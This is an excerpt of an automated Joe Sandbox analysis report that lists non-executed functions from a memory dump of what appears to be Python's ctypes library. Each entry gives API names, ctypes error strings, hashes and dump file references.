                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                          • Instruction ID: a63ab22bec85efa9cdef0c46e86ea8ad5b15aa146ad1542fa0d7e3035dd720b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF05810B1E24F84FFD677B2591137916C05F98BA0F0A4231EC2FC7AC2EE2CA4638112

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00007FF8BFB742C4 Relevance: 45.7, APIs: 19, Strings: 7, Instructions: 211COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dealloc$Err_$Object_String$AttrDict_Long_LookupMallocMem_$CallDescr_ExceptionItemMatchesMemoryObjectOccurredSignSsize_tUpdate
                                                                                                                                                                                                                          • String ID: The '_length_' attribute is too large$The '_length_' attribute must be an integer$The '_length_' attribute must not be negative$_type_ must have storage info$array too large$class must define a '_length_' attribute$class must define a '_type_' attribute
                                                                                                                                                                                                                          • API String ID: 1094985414-504660705
                                                                                                                                                                                                                          • Opcode ID: 618371b017bfb42e6c387fd73ed1a77009a15e34f6dbbb0f99ccff6f8b3ed9d2
                                                                                                                                                                                                                          • Instruction ID: 1cc2590422f38699c30a79e7060a2033b72a207838e9d6d6c1ed8d98888d3b23
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618371b017bfb42e6c387fd73ed1a77009a15e34f6dbbb0f99ccff6f8b3ed9d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49A11921A0AB42D1FB54AFADD8942B937A4FF85BE4F184231DB1E466A5DF3CE495C300
                                                                                                                                                                                                                          Function 00007FF8BFB7A6D0 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 223COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$FromNumber_OccurredSsize_tString$Mem_Unicode_$Bytes_CharMallocSizeWide$FreeList_Memory
                                                                                                                                                                                                                          • String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
                                                                                                                                                                                                                          • API String ID: 869507174-3059441807
                                                                                                                                                                                                                          • Opcode ID: 70b66605ccd097e78c16a38ef12c19642d171d9870e87ce71708b90003173da8
                                                                                                                                                                                                                          • Instruction ID: 5cbb4b5ce04246c051947a433738635de2deb1cf1a0f5f88263406dbd9a16d91
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70b66605ccd097e78c16a38ef12c19642d171d9870e87ce71708b90003173da8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDA14021B0AA4281FE949F9DD544179ABA9BF94FE0F044631CB6E47BF6EE2CE455C300
                                                                                                                                                                                                                          Function 00007FF8BFB72CB0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 127COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mem_$CallDict_Err_FreeFunctionItemMallocObject_$DeallocErrorFromLong_OccurredStringUnicode_VoidWith
                                                                                                                                                                                                                          • String ID: LP_%s$_type_$must be a ctypes type$s(O){sO}$s(O){}
                                                                                                                                                                                                                          • API String ID: 2461613936-2311978994
                                                                                                                                                                                                                          • Opcode ID: b2117b3c44d5f46dd7f24c4b35abf2caf2fa320c46810db12cf49d07f67c91ee
                                                                                                                                                                                                                          • Instruction ID: b4ad54673fc8b1d8172b9d38bc554e71d6cc1d4556a3572efe2a1530a3bc00d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2117b3c44d5f46dd7f24c4b35abf2caf2fa320c46810db12cf49d07f67c91ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99513725E0EB0385FB159FADA9541B827A4AF86BE0F180635CB1E07BA6DF3CE444C310
                                                                                                                                                                                                                          Function 00007FF8BFB79A50 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Bytes_Err_FromMem_SizeSlice_String$AdjustFreeIndicesMallocMemoryNumber_OccurredSsize_tUnpack
                                                                                                                                                                                                                          • String ID: indices must be integers
                                                                                                                                                                                                                          • API String ID: 1902650389-2024404580
                                                                                                                                                                                                                          • Opcode ID: 56fc218e470cc9290087d7e1a0b697a8edda5b0b6fe3fe085914f497f61d90d4
                                                                                                                                                                                                                          • Instruction ID: 0d280810565aaea33e96bd87a941ce62fe38f1e2b184a0ebf69715ad7d4b60bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56fc218e470cc9290087d7e1a0b697a8edda5b0b6fe3fe085914f497f61d90d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96715C26A0AA4681EF199FAED9441B86BB1FF84FE4B144131DF1E47BA9DE3DE445C300
                                                                                                                                                                                                                          Function 00007FF8BFB7A0D4 Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 72threadlibraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$String$DeallocEval_Thread$AddressArg_AttrFormatLong_Object_OccurredParseProcRestoreSaveSizeTuple_Void
                                                                                                                                                                                                                          • String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$symbol '%s' not found$the _handle attribute of the second argument must be an integer
                                                                                                                                                                                                                          • API String ID: 3341457601-4011516582
                                                                                                                                                                                                                          • Opcode ID: b1682e2fe6b9403d153e33361adfdb6ece592f2eab746c08e332a8cb71686b83
                                                                                                                                                                                                                          • Instruction ID: b90abc63d66aab3381113c22e803779ed3d266ec4aa3ac6edd4e1dd605e0bc86
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1682e2fe6b9403d153e33361adfdb6ece592f2eab746c08e332a8cb71686b83
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E310721A0AA4281FB449FAEE9441B967A4FFC5FD1B188032DB1E47B65DE2CE449C300
                                                                                                                                                                                                                          Function 00007FF8BFB71458 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 117COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeallocDict_$CallErr_ErrorFromFunction_ItemLong_Object_OccurredPackSizeSsize_tTuple_With
                                                                                                                                                                                                                          • String ID: %.200s_Array_%Id$Array length must be >= 0, not %zd$Expected a type object$_length_$_type_$s(O){s:n,s:O}
                                                                                                                                                                                                                          • API String ID: 2975079148-1488966637
                                                                                                                                                                                                                          • Opcode ID: ea3da00a8fa99686a37871fc0586e0d07918280253ef6fcdb7a7c757238627c5
                                                                                                                                                                                                                          • Instruction ID: 364c37ae874c3722bd935ba05a9ea512108220a1af62fc56db44825d9d64dcaf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea3da00a8fa99686a37871fc0586e0d07918280253ef6fcdb7a7c757238627c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67513B21A0EB4285FB549FEAE8542B927A4FF85BD4F184435DB0E4A7A6EF3CE404C310
                                                                                                                                                                                                                          Function 00007FF8BFB7B6E8 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 154COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B72D
                                                                                                                                                                                                                          • PyObject_CallObject.PYTHON38 ref: 00007FF8BFB7B767
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: _Py_Dealloc.PYTHON38 ref: 00007FF8BFB7B7D2
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7B7F6
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyErr_Format.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B83C
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyObject_IsInstance.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B84D
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B86E
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B883
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B8BF
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyType_IsSubtype.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B8D9
                                                                                                                                                                                                                            • Part of subcall function 00007FF8BFB7B6E8: PyTuple_Pack.PYTHON38(?,?,?,?,?,00007FF8BFB7AE0F,?,?,?,?,00007FF8BFB79799,?), ref: 00007FF8BFB7B94A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: SubtypeType_$Object_$CallDeallocErr_FormatInstanceObjectPackTuple_memcpy
                                                                                                                                                                                                                          • String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance
                                                                                                                                                                                                                          • API String ID: 1877528213-3177377183
                                                                                                                                                                                                                          • Opcode ID: 7ccca54be5616b242e0a439406719945fb519f7f527055ac9e68d89d2586da33
                                                                                                                                                                                                                          • Instruction ID: 919791c012086414eff86397576ae367676263872bc5282554837bec9f2b4a43
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ccca54be5616b242e0a439406719945fb519f7f527055ac9e68d89d2586da33
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63615C66A09B4681EE549F9AE8402786BA1FF84FC4F088432DF0E47BA9DF3CE454C700
                                                                                                                                                                                                                          Function 00007FF8BFB73EF0 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 217COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PyTuple_New.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78B32
                                                                                                                                                                                                                          • PyLong_AsUnsignedLongMask.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78BB4
                                                                                                                                                                                                                          • PyErr_Format.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78CCC
                                                                                                                                                                                                                          • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78CDD
                                                                                                                                                                                                                          • PyTuple_GetSlice.PYTHON38(?,?,?,?,?,?,?,00000000,?,00007FF8BFB7381F), ref: 00007FF8BFB78E38
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Tuple_$DeallocErr_FormatLongLong_MaskSliceUnsigned
                                                                                                                                                                                                                          • String ID: %s 'out' parameter must be passed as default value$NULL stgdict unexpected$call takes exactly %d arguments (%zd given)$paramflag %u not yet implemented
                                                                                                                                                                                                                          • API String ID: 3242343960-2588965191
                                                                                                                                                                                                                          • Opcode ID: c3d25f6ff976ab77f80a9ea2e4cc46bf2b90c6acbe4a17057b8ead6a7b4d00b8
                                                                                                                                                                                                                          • Instruction ID: 077eb5af6bb340e237d3818771cb770b4b3d677f9e822e3ecbb534f27f7207d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3d25f6ff976ab77f80a9ea2e4cc46bf2b90c6acbe4a17057b8ead6a7b4d00b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAA14A76A09B8285EB61CF9AE8402B977A4FB89BC4F244036DB4E87B55DF3CE455C700
                                                                                                                                                                                                                          Function 00007FF8BFB7BC94 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeallocItem$Err_$Dict_ErrorOccurredSequence_With$AttrFormatObject_
                                                                                                                                                                                                                          • String ID: duplicate values for field %R
                                                                                                                                                                                                                          • API String ID: 520049408-1910533534
                                                                                                                                                                                                                          • Opcode ID: 63eb75f7de272bfca248c975c6237f03e04b0ca255ec1df21ccee52375a0f8c8
                                                                                                                                                                                                                          • Instruction ID: abc7b1ecd865c5259e85cae8d9a9a5b4b89fb7aecb3bb5b2f2a167e02c0b8fef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63eb75f7de272bfca248c975c6237f03e04b0ca255ec1df21ccee52375a0f8c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A51A421B0AB4280EE149FAEA84457967A0BF85FE4F048631CF6D477A9EE3CE441C700
                                                                                                                                                                                                                          Function 00007FF8BFB7C0D0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 172COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: SubtypeType_$DeallocObject_$AttrErr_InstanceLookupStringUnicode_
                                                                                                                                                                                                                          • String ID: P$wrong type
                                                                                                                                                                                                                          • API String ID: 1377076302-281217272
                                                                                                                                                                                                                          • Opcode ID: 978eeed2b6b77deb299817cca6917130e5b22cb48f60c1b97f36ef281d6ad2ee
                                                                                                                                                                                                                          • Instruction ID: 33c9d93824bb77a32224dd51c25c8dc9872b69191897d00d59c22755253672a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 978eeed2b6b77deb299817cca6917130e5b22cb48f60c1b97f36ef281d6ad2ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED815BA1A0DA4380FB549F9DD8502792BA0EF95FC4F488439CB4E87BA5EF2CE944C340
                                                                                                                                                                                                                          Function 00007FF8BFB79EA4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 70COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$Buffer_ReleaseString$Arg_FormatParseSizeTuple_memcpy
                                                                                                                                                                                                                          • String ID: Buffer size too small (%zd instead of at least %zd bytes)$abstract class$offset cannot be negative$y*|n:from_buffer_copy
                                                                                                                                                                                                                          • API String ID: 1815618437-871501202
                                                                                                                                                                                                                          • Opcode ID: 03d886769cc6716227b8711dd5de20201db812fee66a2c828ced65105659bb97
                                                                                                                                                                                                                          • Instruction ID: 2f1d948b09bee3edaee4307353a05afe1d3db374466fb688c161e45da43723b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03d886769cc6716227b8711dd5de20201db812fee66a2c828ced65105659bb97
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91310665B19B8681EB20DFAEE8901B967A0FBC8FC4B544032DB5E87B65DE3CE505C740
                                                                                                                                                                                                                          Function 00007FF8BFB7D8B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 102COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FromStringUnicode_
                                                                                                                                                                                                                          • String ID: <cparam '%c' (%I64d)>$<cparam '%c' (%d)>$<cparam '%c' (%f)>$<cparam '%c' (%ld)>$<cparam '%c' (%p)>$<cparam '%c' ('%c')>$<cparam '%c' ('\x%02x')>$<cparam '%c' at %p>$<cparam 0x%02x at %p>
                                                                                                                                                                                                                          • API String ID: 2818169177-1032293993
                                                                                                                                                                                                                          • Opcode ID: 8e7886e10174158f50e63f1f00364b570f2f82a2db45fe417b6a369fba985387
                                                                                                                                                                                                                          • Instruction ID: dfe6f6c113994ba1d5c743bda7a889ee83ce2945c9cf3b9d079f3e323818a1a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e7886e10174158f50e63f1f00364b570f2f82a2db45fe417b6a369fba985387
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA41AF62A1D54385E7799FBCE8545792F71FF897C8F980232D78E068A9EE2CE905C300
                                                                                                                                                                                                                          Function 00007FF8BFB7AE3C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
